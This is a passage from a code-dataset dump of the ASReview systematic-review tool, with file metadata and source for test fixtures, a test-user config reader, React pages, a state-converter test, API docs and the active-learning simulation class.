crud.delete_everything(DB)\n close_all_sessions()\n DB.engine.raw_connection().close()\n\n\[email protected]\ndef client_auth_verified(asreview_path_fixture):\n \"\"\"Flask client for an authenticated app, account\n creation allowed, user accounts needs account\n verification.\"\"\"\n app = _get_app(\"auth-verified\", path=asreview_path_fixture)\n with app.app_context():\n yield app.test_client()\n crud.delete_everything(DB)\n close_all_sessions()\n DB.engine.raw_connection().close()\n\n\[email protected]\ndef client_no_auth(asreview_path_fixture):\n \"\"\"Flask client for an unauthenticated app.\"\"\"\n app = _get_app(\"no-auth\", path=asreview_path_fixture)\n # make sure we have the asreview_path\n with app.app_context():\n yield app.test_client()\n" }, { "alpha_fraction": 0.6412162184715271, "alphanum_fraction": 0.6466216444969177, "avg_line_length": 25.909090042114258, "blob_id": "e90331ffe70bf26aa4a23f677824cdf5f1ea6862", "content_id": "31caeaa4a0633f0afb0b476e80d76ab363d1b516", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1480, "license_type": "permissive", "max_line_length": 65, "num_lines": 55, "path": "/asreview/webapp/tests/utils/config_parser.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import configparser\nfrom pathlib import Path\n\nfrom asreview.webapp.authentication.models import User\n\nconfig_file = \"asreview.ini\"\nconfig_dir = \"config\"\n\nconfig = configparser.ConfigParser()\nBASE_DIR = Path(__file__).resolve().parent.parent\n\nCONFIG_FILE = BASE_DIR.joinpath(config_dir).joinpath(config_file)\n\nconfig.read(CONFIG_FILE)\n\n\n# get user (1 of 3)\ndef get_user(test_user_id):\n \"\"\"Returns a User model based on a test user\n account that can be found in the config file.\n The test_user_id refers to the position of the\n user account credentials in the .ini file\n (1, 2, or 3)\"\"\"\n section = config[f\"user{test_user_id}\"]\n # create user\n user = User(\n section[\"email\"],\n email=section[\"email\"],\n name=section[\"name\"],\n affiliation=section[\"affiliation\"],\n password=section[\"password\"],\n )\n # store password\n user.password = section[\"password\"]\n return user\n\n\ndef get_user_data(test_user_id):\n \"\"\"Returns the data for a user account as a\n dictionary.\"\"\"\n section = config[f\"user{test_user_id}\"]\n return {\n \"email\": section[\"email\"],\n \"name\": section[\"name\"],\n \"affiliation\": section[\"affiliation\"],\n \"password\": section[\"password\"]\n }\n\n\n# get all users\ndef all_users():\n \"\"\"Returns a dictionary containing User models,\n the keys are identifiers in the .ini file.\"\"\"\n users = [get_user(id) for id in [1, 2, 3]]\n return {u.identifier: u for u in users}\n" }, { "alpha_fraction": 0.5462207794189453, "alphanum_fraction": 0.5511147379875183, "avg_line_length": 26.244443893432617, "blob_id": "a0c0f1ae579285a91ba28e2226c6811ada619eae", "content_id": "8db1f94de240bd972e39a75d5d0f902e09050e59", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3678, "license_type": "permissive", "max_line_length": 84, "num_lines": 135, "path": "/asreview/webapp/src/ProjectComponents/ReviewComponents/ReviewPageFinished.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { useMutation, useQueryClient } from \"react-query\";\nimport { useNavigate, useParams } from \"react-router-dom\";\nimport { Button, 
Fade, Link, Stack, Typography } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { ActionsFeedbackBar } from \"../../Components\";\n\nimport { ProjectAPI } from \"../../api/index.js\";\nimport { projectStatuses } from \"../../globals.js\";\nimport ElasFinished from \"../../images/ElasFinished.svg\";\n\nconst PREFIX = \"ReviewPageFinished\";\n\nconst classes = {\n img: `${PREFIX}-img`,\n textTitle: `${PREFIX}-textTitle`,\n text: `${PREFIX}-text`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n height: \"inherit\",\n [`& .${classes.img}`]: {\n maxWidth: 350,\n [theme.breakpoints.down(\"md\")]: {\n maxWidth: 250,\n },\n },\n\n [`& .${classes.textTitle}`]: {\n textAlign: \"center\",\n [theme.breakpoints.down(\"md\")]: {\n width: \"80%\",\n },\n },\n\n [`& .${classes.text}`]: {\n textAlign: \"center\",\n width: \"60%\",\n [theme.breakpoints.down(\"md\")]: {\n width: \"80%\",\n },\n },\n}));\n\nconst ReviewPageFinished = (props) => {\n const navigate = useNavigate();\n const { project_id } = useParams();\n const queryClient = useQueryClient();\n\n const [recordEmpty, setRecordEmpty] = React.useState(false);\n\n const { error, isError, mutate, reset } = useMutation(\n ProjectAPI.mutateProjectStatus,\n {\n onSuccess: () => {\n queryClient.invalidateQueries(\"fetchInfo\");\n },\n },\n );\n\n const handleChangeStatus = () => {\n mutate({\n project_id,\n status: projectStatuses.REVIEW,\n });\n };\n\n const handleClickExport = () => {\n navigate(`/projects/${project_id}/export`);\n };\n\n const ifRecordPoolEmpty = React.useCallback(async () => {\n const data = await queryClient.fetchQuery(\n [\"fetchRecord\", { project_id }],\n ProjectAPI.fetchRecord,\n );\n setRecordEmpty(data[\"pool_empty\"]);\n }, [project_id, queryClient]);\n\n React.useEffect(() => {\n ifRecordPoolEmpty();\n }, [ifRecordPoolEmpty]);\n\n return (\n <Root aria-label=\"review page finished\">\n <Fade in>\n <Stack\n spacing={1}\n sx={{\n alignItems: \"center\",\n height: \"inherit\",\n justifyContent: \"center\",\n }}\n >\n <img src={ElasFinished} alt=\"ElasFinished\" className={classes.img} />\n {!recordEmpty && (\n <Stack spacing={1} sx={{ alignItems: \"center\" }}>\n <Typography className={classes.textTitle} variant=\"h5\">\n Congratulations! You have finished this project.\n </Typography>\n <Typography className={classes.text}>\n You have stopped reviewing and marked this project as finished.{\" \"}\n <Link\n component=\"button\"\n variant=\"body1\"\n onClick={handleChangeStatus}\n >\n Resume the review\n </Link>\n </Typography>\n </Stack>\n )}\n {recordEmpty && (\n <Stack spacing={3} sx={{ alignItems: \"center\" }}>\n <Typography className={classes.textTitle} variant=\"h5\">\n Congratulations! 
You have reviewed all the records.\n </Typography>\n <Button onClick={handleClickExport}>Export results</Button>\n </Stack>\n )}\n </Stack>\n </Fade>\n {isError && (\n <ActionsFeedbackBar\n feedback={error?.message + \" Please try again.\"}\n open={isError}\n onClose={reset}\n />\n )}\n </Root>\n );\n};\n\nexport default ReviewPageFinished;\n" }, { "alpha_fraction": 0.6931752562522888, "alphanum_fraction": 0.6951995491981506, "avg_line_length": 37.85393142700195, "blob_id": "ffcc0a0e0300b886f3a4f7f0a10a3a7a3d50e85d", "content_id": "fb3e1f4b690e7107bb7e0c621736268f3d2181cd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3458, "license_type": "permissive", "max_line_length": 85, "num_lines": 89, "path": "/tests/test_converter.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import json\nfrom pathlib import Path\nfrom shutil import copyfile\nfrom shutil import make_archive\nfrom zipfile import ZipFile\n\nfrom asreview.project import ASReviewProject\nfrom asreview.project import open_state\nfrom asreview.state.legacy.json import JSONState\nfrom asreview.state.legacy.utils import open_state as open_state_legacy\nfrom asreview.state.legacy.utils import state_from_file\nfrom asreview.state.sql_converter import is_converted_project\nfrom asreview.state.sql_converter import rollback_conversion\nfrom asreview.state.sql_converter import upgrade_asreview_project_file\n\nOLD_STATE_FP = Path(\"tests\", \"asreview_files\", \"test_converter_example_old.asreview\")\n\n\ndef compare_state_to_converted(state_fp, converted_state_fp):\n \"\"\"Compare an old state file to a converted state file and\n check that the contents are the same\n\n Arguments\n ---------\n state_fp: path-like\n Filepath to the old project file.\n converted_state_fp: path-like\n Filepath to the converted state file.\n \"\"\"\n with open(Path(state_fp.parent, \"labeled.json\"), \"r\") as file:\n labeled_json = json.load(file)\n # old_record_ids = [x[0] for x in labeled_json]\n old_labels = [x[1] for x in labeled_json]\n\n with open_state_legacy(state_fp) as old_state:\n old_state_length = len(old_state._state_dict[\"labels\"])\n\n data_hash = list(old_state._state_dict[\"data_properties\"].keys())[0]\n old_feature_matrix = old_state.get_feature_matrix(data_hash)\n old_settings = old_state.settings.to_dict()\n\n with open_state(converted_state_fp) as new_state:\n # Get data from the new state.\n new_record_ids = new_state.get_order_of_labeling().tolist()\n new_labels = new_state.get_labels().tolist()\n new_settings = new_state.settings.to_dict()\n\n new_project = ASReviewProject(converted_state_fp)\n feature_extraction_method = new_project.feature_matrices[0][\"id\"]\n new_feature_matrix = new_project.get_feature_matrix(feature_extraction_method)\n\n # Compare data.\n # assert old_indices == new_record_ids\n assert max(new_record_ids) < old_state_length\n assert old_labels == new_labels\n # assert old_query_strategies == new_query_strategies\n assert (old_feature_matrix != new_feature_matrix).nnz == 0\n assert old_settings == new_settings\n\n\ndef test_converter(tmpdir):\n # Copy old project file to temporary folder.\n converted_fp = Path(tmpdir, \"converted.asreview\")\n copyfile(OLD_STATE_FP, converted_fp)\n\n # Unzip the converted state file.\n unzipped_fp = Path(tmpdir, \"unzipped.asreview\")\n with ZipFile(converted_fp) as zipobj:\n zipobj.extractall(unzipped_fp)\n converted_fp = unzipped_fp\n # 
-------------------------------------------------\n # Convert the old project file to a new state file.\n upgrade_asreview_project_file(converted_fp, from_version=0, to_version=1)\n\n # Check that the contents are the same.\n compare_state_to_converted(\n Path(converted_fp, \"legacy\", \"result.json\"), converted_fp\n )\n\n # Check if the rollback works.\n assert is_converted_project(converted_fp)\n rollback_conversion(converted_fp)\n\n # Zip the converted file to allow for reading it.\n zipped_fp = make_archive(Path(tmpdir, \"zipped\"), \"zip\", converted_fp)\n zipped_fp = Path(zipped_fp).rename(Path(tmpdir, \"zipped.asreview\"))\n\n state = state_from_file(zipped_fp)[zipped_fp.name]\n assert isinstance(state, JSONState)\n" }, { "alpha_fraction": 0.6393629312515259, "alphanum_fraction": 0.6496018171310425, "avg_line_length": 34.8775520324707, "blob_id": "3fc8aff4d7f74ada6cf2760dd17ffef38ff836e2", "content_id": "1e699891df832124bc6d5989c684b5c3fe0f2fba", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1758, "license_type": "permissive", "max_line_length": 88, "num_lines": 49, "path": "/asreview/state/utils.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom pathlib import Path\n\nfrom asreview.state.errors import StateNotFoundError\n\nV3STATE_VERSION = \"1.0\"\n\n\ndef is_zipped_project_file(fp):\n \"\"\"Check if it is a zipped asreview project file.\"\"\"\n if Path(fp).is_file():\n state_ext = Path(fp).suffix\n\n if state_ext in [\".h5\", \".hdf5\", \".he5\", \".json\"]:\n raise ValueError(\n f\"State file with extension {state_ext} is no longer \"\n f\"supported. Migrate to the new format or \"\n \"use an older version of ASReview. See LINK.\"\n )\n elif state_ext == \".asreview\":\n return True\n else:\n raise ValueError(f\"State file extension {state_ext} is not \" f\"recognized.\")\n else:\n return False\n\n\ndef is_valid_project_folder(fp):\n \"\"\"Check of the folder contains an asreview project.\"\"\"\n if not Path(fp, \"reviews\").is_dir() or not Path(fp, \"feature_matrices\").is_dir():\n raise StateNotFoundError(\n f\"There does not seem to be a valid project folder at {fp}. The \"\n f\"'reviews' or 'feature_matrices' folder is missing.\"\n )\n else:\n return\n" }, { "alpha_fraction": 0.6971312165260315, "alphanum_fraction": 0.6976014971733093, "avg_line_length": 15.740157127380371, "blob_id": "8b4401a6cb1ba8ef61a61d5a6b79f6d5722c8a1a", "content_id": "72bd61ecff1b6e76f49a6dbfdfb63ba84071be0c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 6379, "license_type": "permissive", "max_line_length": 92, "num_lines": 381, "path": "/docs/source/reference.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": ".. _api_ref:\n\n=============\nAPI Reference\n=============\n\n\n.. 
automodule:: asreview\n\nData and datasets\n=================\n\n.. automodule:: asreview.data\n\n.. currentmodule:: asreview\n\nRead data\n---------\n\n.. autosummary::\n :toctree: generated/\n\n load_data\n ASReviewData\n\n\nStatistics\n----------\n\n.. autosummary::\n :toctree: generated/\n\n data.statistics.abstract_length\n data.statistics.n_duplicates\n data.statistics.n_irrelevant\n data.statistics.n_keywords\n data.statistics.n_missing_abstract\n data.statistics.n_missing_title\n data.statistics.n_records\n data.statistics.n_relevant\n data.statistics.n_unlabeled\n data.statistics.title_length\n\n\nDatasets\n--------\n\nAvailable datasets\n~~~~~~~~~~~~~~~~~~\n\n.. automodule:: asreview.datasets\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview\n\n\n.. autosummary::\n :toctree: generated/\n\n asreview.datasets.BenchmarkDataGroup\n asreview.datasets.NaturePublicationDataGroup\n\nDataset managers\n~~~~~~~~~~~~~~~~\n\n.. autosummary::\n :toctree: generated/\n\n asreview.datasets.BaseDataSet\n asreview.datasets.BaseDataGroup\n asreview.datasets.DatasetManager\n\n\nReviewer\n========\n\n.. automodule:: asreview.review\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview\n\n.. autosummary::\n :toctree: generated/\n\n review.BaseReview\n review.ReviewSimulate\n\n\n.. _ref-models:\n\nModels\n======\n\nThis section provides an overview of the available models for active learning\nin ASReview. For command line usage, use the name (``example``) given behind\nthe model description (or see the name property of the model). Some models\nrequire additional dependencies, see the model class for more information and\ninstructions.\n\n.. automodule:: asreview.models\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview\n\nBase class\n\n.. autosummary::\n :toctree: generated/\n\n models.base.BaseModel\n\n.. _ref-feature-extraction:\n\n:mod:`asreview.models.feature_extraction`\n-----------------------------------------\n\n.. automodule:: asreview.models.feature_extraction\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview.models\n\nClasses\n\n.. autosummary::\n :toctree: generated/\n\n feature_extraction.base.BaseFeatureExtraction\n feature_extraction.Tfidf\n feature_extraction.Doc2Vec\n feature_extraction.EmbeddingIdf\n feature_extraction.EmbeddingLSTM\n feature_extraction.SBERT\n\nFunctions\n\n.. autosummary::\n :toctree: generated/\n\n feature_extraction.get_feature_model\n feature_extraction.get_feature_class\n feature_extraction.list_feature_extraction\n\n.. _ref-classifiers:\n\n:mod:`asreview.models.classifiers`\n----------------------------------\n\n.. automodule:: asreview.models.classifiers\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview.models\n\nClasses\n\n.. autosummary::\n :toctree: generated/\n\n classifiers.base.BaseTrainClassifier\n classifiers.NaiveBayesClassifier\n classifiers.RandomForestClassifier\n classifiers.SVMClassifier\n classifiers.LogisticClassifier\n classifiers.LSTMBaseClassifier\n classifiers.LSTMPoolClassifier\n classifiers.NN2LayerClassifier\n\nFunctions\n\n.. autosummary::\n :toctree: generated/\n\n classifiers.get_classifier\n classifiers.get_classifier_class\n classifiers.list_classifiers\n\n\n\n.. _ref-query-strategies:\n\n:mod:`asreview.models.query`\n----------------------------\n\n.. automodule:: asreview.models.query\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview.models\n\nClasses\n\n.. 
autosummary::\n :toctree: generated/\n\n query.base.BaseQueryStrategy\n query.base.ProbaQueryStrategy\n query.MaxQuery\n query.MixedQuery\n query.MaxRandomQuery\n query.MaxUncertaintyQuery\n query.UncertaintyQuery\n query.RandomQuery\n query.ClusterQuery\n\n\nFunctions\n\n.. autosummary::\n :toctree: generated/\n\n query.get_query_model\n query.get_query_class\n query.list_query_strategies\n\n \n.. _ref-balance-strategies:\n\n:mod:`asreview.models.balance`\n------------------------------\n\n.. automodule:: asreview.models.balance\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview.models\n\nClasses\n\n.. autosummary::\n :toctree: generated/\n\n balance.base.BaseBalance\n balance.SimpleBalance\n balance.DoubleBalance\n balance.TripleBalance\n balance.UndersampleBalance\n\n\nFunctions\n\n.. autosummary::\n :toctree: generated/\n\n balance.get_balance_model\n balance.get_balance_class\n balance.list_balance_strategies\n\n\n\n\n\nProjects and States\n===================\n\nLoad, interact, and extract information from project files and states (the\n\"diary\" of the review).\n\n.. automodule:: asreview.project\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview\n\n.. autosummary::\n :toctree: generated/\n\nASReviewProject\n---------------\n\n.. autosummary::\n :toctree: generated/\n\n ASReviewProject\n\nState\n-----\n\n.. automodule:: asreview.state\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview\n\n.. autosummary::\n :toctree: generated/\n\n open_state\n state.SQLiteState\n\n\nUtils\n-----\n\n.. autosummary::\n :toctree: generated/\n\n project.get_project_path\n project.project_from_id\n project.get_projects\n project.is_project\n project.is_v0_project\n\n\nReaders and writers\n===================\n\nThis module contains the input and output functionality. You can install them as extensions.\n\n\n.. currentmodule:: asreview\n\n.. autosummary::\n :toctree: generated/\n\n asreview.list_readers\n asreview.list_writers\n\n.. automodule:: asreview.io\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview\n\n.. autosummary::\n :toctree: generated/\n\n io.CSVReader\n io.CSVWriter\n io.ExcelReader\n io.ExcelWriter\n io.PaperRecord\n io.RISReader\n io.RISWriter\n io.TSVWriter\n\nMisc\n====\n\n.. currentmodule:: asreview\n\nClasses\n\n.. autosummary::\n :toctree: generated/\n\n asreview.settings.ASReviewSettings\n\nFunctions\n\n.. autosummary::\n :toctree: generated/\n\n search.fuzzy_find\n asreview_path\n get_data_home\n\n\nEntry points\n============\n\nEntry points for ASReview LAB.\n\n\n.. automodule:: asreview.entry_points\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview\n\n.. 
autosummary::\n :toctree: generated/\n\n entry_points.BaseEntryPoint\n entry_points.AlgorithmsEntryPoint\n entry_points.LABEntryPoint\n entry_points.SimulateEntryPoint\n entry_points.StateInspectEntryPoint\n\n" }, { "alpha_fraction": 0.5602137446403503, "alphanum_fraction": 0.5610357522964478, "avg_line_length": 26.965517044067383, "blob_id": "b444aa381df6fc74045f31294629643963862c6b", "content_id": "8c11171cfa24393f42006a208257891b826ca8f3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2433, "license_type": "permissive", "max_line_length": 75, "num_lines": 87, "path": "/asreview/webapp/src/HomeComponents/HomePage.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Navigate, Routes, Route } from \"react-router-dom\";\nimport clsx from \"clsx\";\nimport { Box } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport {\n ProfilePage,\n ProjectsOverview,\n} from \"../HomeComponents/DashboardComponents\";\nimport RouteNotFound from \"../RouteNotFound\";\n\nimport { drawerWidth } from \"../globals.js\";\n\nconst PREFIX = \"HomePage\";\n\nconst classes = {\n content: `${PREFIX}-content`,\n contentShift: `${PREFIX}-contentShift`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.content}`]: {\n transition: theme.transitions.create(\"margin\", {\n easing: theme.transitions.easing.sharp,\n duration: theme.transitions.duration.leavingScreen,\n }),\n [theme.breakpoints.up(\"md\")]: {\n marginLeft: 72,\n },\n },\n\n [`& .${classes.contentShift}`]: {\n transition: theme.transitions.create(\"margin\", {\n easing: theme.transitions.easing.easeOut,\n duration: theme.transitions.duration.enteringScreen,\n }),\n marginLeft: drawerWidth,\n },\n}));\n\nconst HomePage = (props) => {\n return (\n <Root aria-label=\"home page\">\n <Box\n component=\"main\"\n className={clsx(\"main-page-content\", classes.content, {\n [classes.contentShift]: !props.mobileScreen && props.onNavDrawer,\n })}\n aria-label=\"home page content\"\n >\n <Routes>\n {/* Projects dashboard */}\n <Route\n path=\"projects\"\n element={\n <ProjectsOverview\n mobileScreen={props.mobileScreen}\n onNavDrawer={props.onNavDrawer}\n onProjectSetup={props.onProjectSetup}\n projectCheck={props.projectCheck}\n setProjectCheck={props.setProjectCheck}\n toggleProjectSetup={props.toggleProjectSetup}\n />\n }\n />\n {/* Profile page */}\n <Route\n path=\"profile\"\n element={\n <ProfilePage\n mobileScreen={props.mobileScreen}\n onNavDrawer={props.onNavDrawer}\n />\n }\n />\n {/* Redirect root to projects */}\n <Route path=\"/\" element={<Navigate to=\"/projects\" />} />\n {/* Not found */}\n <Route path=\"*\" element={<RouteNotFound />} />\n </Routes>\n </Box>\n </Root>\n );\n};\n\nexport default HomePage;\n" }, { "alpha_fraction": 0.5883496403694153, "alphanum_fraction": 0.5913828015327454, "avg_line_length": 35.52840805053711, "blob_id": "6436fcf014c52cd0398aac0c014bdba32a59b701", "content_id": "99bb1823399d17828c913785e83bb9e0b8c29a25", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12858, "license_type": "permissive", "max_line_length": 88, "num_lines": 352, "path": "/asreview/review/simulate.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom datetime import datetime\n\nimport numpy as np\nimport pandas as pd\n\nfrom asreview.project import open_state\nfrom asreview.review import BaseReview\nfrom asreview.review.base import LABEL_NA\nfrom asreview.utils import get_random_state\n\n\ndef sample_prior_knowledge(\n labels, n_prior_included=10, n_prior_excluded=10, random_state=None\n):\n \"\"\"Function to sample prelabelled articles.\n\n Arguments\n ---------\n labels: np.ndarray\n Array of labels, with 1 -> included, 0 -> excluded.\n n_prior_included: int\n The number of positive labels.\n n_prior_excluded: int\n The number of negative labels.\n random_state : int, RandomState instance or None, optional (default=None)\n If int, random_state is the seed used by the random number generator;\n If RandomState instance, random_state is the random number generator;\n If None, the random number generator is the RandomState instance used\n by `np.random`.\n\n Returns\n -------\n np.ndarray:\n An array with n_prior_included and n_prior_excluded indices.\n\n \"\"\"\n # set random state\n r = get_random_state(random_state)\n\n # retrieve the index of included and excluded papers\n included_idx = np.where(labels == 1)[0]\n excluded_idx = np.where(labels == 0)[0]\n\n if len(included_idx) < n_prior_included:\n raise ValueError(\n f\"Number of included priors requested ({n_prior_included})\"\n f\" is bigger than the number of included papers \"\n f\"({len(included_idx)}).\"\n )\n if len(excluded_idx) < n_prior_excluded:\n raise ValueError(\n f\"Number of excluded priors requested ({n_prior_excluded})\"\n f\" is bigger than the number of excluded papers \"\n f\"({len(excluded_idx)}).\"\n )\n # select randomly from included and excluded papers\n included_indexes_sample = r.choice(included_idx, n_prior_included, replace=False)\n excluded_indexes_sample = r.choice(excluded_idx, n_prior_excluded, replace=False)\n\n init = np.append(included_indexes_sample, excluded_indexes_sample)\n\n return init\n\n\nclass ReviewSimulate(BaseReview):\n \"\"\"ASReview Simulation mode class.\n\n Arguments\n ---------\n as_data: asreview.ASReviewData\n The data object which contains the text, labels, etc.\n model: BaseModel\n Initialized model to fit the data during active learning.\n See asreview.models.utils.py for possible models.\n query_model: BaseQueryModel\n Initialized model to query new instances for review, such as random\n sampling or max sampling.\n See asreview.query_strategies.utils.py for query models.\n balance_model: BaseBalanceModel\n Initialized model to redistribute the training data during the\n active learning process. 
They might either resample or undersample\n specific papers.\n feature_model: BaseFeatureModel\n Feature extraction model that converts texts and keywords to\n feature matrices.\n n_prior_included: int\n Sample n prior included papers.\n n_prior_excluded: int\n Sample n prior excluded papers.\n prior_indices: int\n Prior indices by row number.\n n_instances: int\n Number of papers to query at each step in the active learning\n process.\n stop_if: int\n Number of steps/queries to perform. Set to None for no limit.\n start_idx: numpy.ndarray\n Start the simulation/review with these indices. They are assumed to\n be already labeled. Failing to do so might result in bad behaviour.\n init_seed: int\n Seed for setting the prior indices if the --prior_idx option is\n not used. If the option prior_idx is used with one or more\n indices, this option is ignored.\n state_file: str\n Path to state file.\n write_interval: int\n After how many labeled records to write the simulation data to the\n state.\n \"\"\"\n\n name = \"simulate\"\n\n def __init__(\n self,\n as_data,\n *args,\n n_prior_included=0,\n n_prior_excluded=0,\n prior_indices=None,\n init_seed=None,\n write_interval=None,\n **kwargs,\n ):\n self.n_prior_included = n_prior_included\n self.n_prior_excluded = n_prior_excluded\n\n self.write_interval = write_interval\n\n # check for partly labeled data\n labels = as_data.labels\n labeled_idx = np.where((labels == 0) | (labels == 1))[0]\n if len(labeled_idx) != len(labels):\n raise ValueError(\"Expected fully labeled dataset.\")\n\n if prior_indices is not None and len(prior_indices) != 0:\n start_idx = prior_indices\n else:\n start_idx = as_data.prior_data_idx\n if len(start_idx) == 0 and n_prior_included + n_prior_excluded > 0:\n start_idx = sample_prior_knowledge(\n labels, n_prior_included, n_prior_excluded, random_state=init_seed\n )\n super(ReviewSimulate, self).__init__(\n as_data, *args, start_idx=start_idx, **kwargs\n )\n\n # Setup the reviewer attributes that take over the role of state\n # functions.\n with open_state(self.project) as state:\n # Check if there is already a ranking stored in the state.\n if state.model_has_trained:\n self.last_ranking = state.get_last_ranking()\n else:\n self.last_ranking = None\n\n self.labeled = state.get_labeled()\n self.pool = pd.Series(\n [\n record_id\n for record_id in self.record_table\n if record_id not in self.labeled[\"record_id\"].values\n ]\n )\n self.training_set = len(self.labeled)\n\n # Get the number of queries.\n training_sets = state.get_training_sets()\n # There is one query per trained model. 
We subtract 1\n # for the priors.\n self.total_queries = len(set(training_sets)) - 1\n\n # Check that both labels are available.\n if (0 not in self.labeled[\"label\"].values) or (\n 1 not in self.labeled[\"label\"].values\n ):\n raise ValueError(\n \"Not both labels available. Make sure there\"\n \" is an included and excluded record in \"\n \"the priors.\"\n )\n\n self.results = pd.DataFrame(\n [],\n columns=[\n \"record_id\",\n \"label\",\n \"classifier\",\n \"query_strategy\",\n \"balance_strategy\",\n \"feature_extraction\",\n \"training_set\",\n \"labeling_time\",\n \"notes\",\n ],\n )\n\n def _label_priors(self):\n \"\"\"Make sure all the priors are labeled as well as the pending\n labels.\"\"\"\n with open_state(self.project, read_only=False) as state:\n # Make sure the prior records are labeled.\n labeled = state.get_labeled()\n unlabeled_priors = [\n x for x in self.prior_indices if x not in labeled[\"record_id\"].to_list()\n ]\n labels = self.data_labels[unlabeled_priors]\n\n with open_state(self.project, read_only=False) as s:\n s.add_labeling_data(unlabeled_priors, labels, prior=True)\n\n # Make sure the pending records are labeled.\n pending = state.get_pending()\n pending_labels = self.data_labels[pending]\n state.add_labeling_data(pending, pending_labels)\n\n def _stop_review(self):\n \"\"\"In simulation mode, the stop review function should get the labeled\n records list from the reviewer attribute.\"\"\"\n\n # if the pool is empty, always stop\n if self.pool.empty:\n return True\n\n # If stop_if is set to min, stop when all papers in the pool are\n # irrelevant.\n if self.stop_if == \"min\" and (self.data_labels[self.pool] == 0).all():\n return True\n\n # Stop when reaching stop_if (if provided)\n if isinstance(self.stop_if, int) and self.total_queries >= self.stop_if:\n return True\n\n return False\n\n def train(self):\n \"\"\"Train a new model on the labeled data.\"\"\"\n # The check that both labels are available is done in init for simulation.\n # Use the balance model to sample the training data.\n new_training_set = len(self.labeled)\n\n y_sample_input = (\n pd.DataFrame(self.record_table)\n .merge(self.labeled, how=\"left\", on=\"record_id\")\n .loc[:, \"label\"]\n .fillna(LABEL_NA)\n .to_numpy()\n )\n train_idx = np.where(y_sample_input != LABEL_NA)[0]\n\n X_train, y_train = self.balance_model.sample(self.X, y_sample_input, train_idx)\n\n # Fit the classifier on the training data.\n self.classifier.fit(X_train, y_train)\n\n # Use the query strategy to produce a ranking.\n ranked_record_ids = self.query_strategy.query(\n self.X, classifier=self.classifier\n )\n\n self.last_ranking = pd.concat(\n [pd.Series(ranked_record_ids), pd.Series(range(len(ranked_record_ids)))],\n axis=1,\n )\n self.last_ranking.columns = [\"record_id\", \"label\"]\n\n self.training_set = new_training_set\n\n def _query(self, n):\n \"\"\"In simulation mode, the query function should get the n highest\n ranked unlabeled records, without writing the model data to the results\n table.\"\"\"\n 
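# serve the highest-ranked records from the last ranking that are still in the pool\n 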
The\"\"\"\n unlabeled_ranking = self.last_ranking[\n self.last_ranking[\"record_id\"].isin(self.pool)\n ]\n\n self.total_queries += 1\n\n return unlabeled_ranking[\"record_id\"].iloc[:n].to_list()\n\n def _label(self, record_ids, prior=False):\n \"\"\"In simulation mode, the label function should also add the model\n data to the results table.\"\"\"\n\n labels = self.data_labels[record_ids]\n labeling_time = datetime.now()\n\n results = []\n for record_id, label in zip(record_ids, labels):\n results.append(\n {\n \"record_id\": int(record_id),\n \"label\": int(label),\n \"classifier\": self.classifier.name,\n \"query_strategy\": self.query_strategy.name,\n \"balance_strategy\": self.balance_model.name,\n \"feature_extraction\": self.feature_extraction.name,\n \"training_set\": int(self.training_set),\n \"labeling_time\": str(labeling_time),\n \"notes\": None,\n }\n )\n\n self.results = pd.concat(\n [self.results, pd.DataFrame(results)], ignore_index=True\n )\n\n # Add the record ids to the labeled and remove from the pool.\n new_labeled_data = pd.DataFrame(\n zip(record_ids, labels), columns=[\"record_id\", \"label\"]\n )\n self.labeled = pd.concat([self.labeled, new_labeled_data], ignore_index=True)\n self.pool = 